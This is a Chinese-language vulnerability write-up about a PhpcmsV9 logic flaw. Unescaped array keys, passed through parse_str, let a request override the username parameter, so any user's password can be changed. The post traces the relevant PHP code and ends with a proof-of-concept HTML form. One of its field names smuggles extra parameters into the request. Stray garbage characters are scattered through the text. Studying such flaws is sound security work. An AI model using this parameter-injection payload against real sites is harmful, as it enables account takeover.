PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
) e# j& @$ U' t  i1 ^& S

parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
" U8 {7 }+ e* w
5 Z, S1 C) p6 C9 \在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
/ S8 c& W2 x  U
" R- G5 @8 x6 Q2 @' s/ f4 m) O+ D4 K我把它留给了你们。
不知道你们发现了它没有。
) l# b. M3 R! k4 l! [
4 c" I! w% z6 M6 U) o我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。
8 k2 v7 F0 v+ V0 k" W& V( u: O
" d* v1 z. N( h所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。
: h" E& ^6 @  b/ l5 `. q
也就是

' W0 ^# _' \/ Xusername=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。

- K" [. K* S$ }: j% ~2 m% y( P1 h要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
6 ]+ c. F: W1 ^8 [0 `7 d3 V

其实我们有这样的机会，看看代码，如下：

6 i( n, ~1 ?" w9 M* ~3 y1 {
public function auth_data($data) {
                $s = $sep = '';
                foreach($data as $k => $v) {
                        if(is_array($v)) {
! r, ~' F0 I  R) N6 }1 w                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
; J; J: s, o2 O3 ]9 Q. E$ |/ T                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
. N  f) Q; s. V$ _' ?                                        $sep2 = '&';
                                }
0 J" {: p. J  z+ N                                $s .= $sep.$s2;
                        } else {
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
                        }
' y* V& D" H: o1 `                        $sep = '&';
& ~' W9 G. d3 N. H4 V' g0 j* [                }
" y0 U3 ]1 j0 y9 q3 |
( ?# [. l& f6 K- k8 k2 ]9 @                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
* J5 u# j; w  |$ T7 t                return $auth_s;
        }

6 \9 M% A, K* l+ _可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。

举个例子

0 v2 V9 N' l+ t- U$ P$ {: M$a[aaa=a&bbb] = 'a';

6 o& T2 u5 y; V+ {, D& T会变成aaa=a&bbb=a

" p' O9 e  z1 F* O- b8 r明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

这个时候，我们可以再去看一个函数。
- e  m1 n  E) V& J7 P
* {, ]* W- }( b4 g就在这个文件内：

; k0 J* l$ j# O* q
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
' W1 ^( w+ v6 G# Z" q9 e, G3 k                        return -4;
                }
  \  U+ t0 \6 |                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }

这是向通行证发了这样一个请求。

我们再跟到通信证代码里去看看，就会有所发现。
' G3 Y- E, h- c% V+ }' w) e
! B8 U$ u4 s9 K0 g, l5 a
! J7 l4 }, c; G' _2 O' Spublic function edit() {
//能省就省，太长了不是吗？

if($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
. v# W% c& k& O; w: e6 k; m                                $res = $this->db->update($data, array('username'=>$this->username));
                        } else {
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }

好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

" A5 }% l8 a3 Q% Apublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
  I# w$ q+ t. _, ]0 P$ Y: C' l
7 Y$ G8 z1 A3 H; p很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。
7 e- J) i5 x5 p! W/ Z
我当然找到了：
phpcms9/phpcms/modules/member/index.php
  B* d6 k- f' \' r3 e6 W
/ n2 r( i- n+ y6 |$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
1 U1 c* P! j, V7 I- ~- C
  v5 N: X, \5 P, k然后就没有然后了。

<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
                                <table width="100%" cellspacing="0" class="table_form">
( z; a8 g- e* C, S! x                                        <tr>
' K4 H5 s/ R+ E. @: y0 p" i+ }4 a& q                                                <th width="80">邮箱：</th>        
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
                                        </tr>
                                        <tr>
                                                <th width="80">原密码：</th>        
# G/ g4 X& }' B, Z9 U9 Y/ s, M                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
; w6 Q1 i% A2 {  w                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
8 {+ v3 w2 J8 M' [                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
                                        </tr>
; }4 p* w1 R0 v1 Q6 Y. N- |                                        <th></th>
8 m+ c; N$ V: d1 G: ?5 u  q                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
                                </table>
* h/ V" Q- {1 D: H! ]
                               
3 a3 G7 |& c( L, @) d* K7 D                        </form>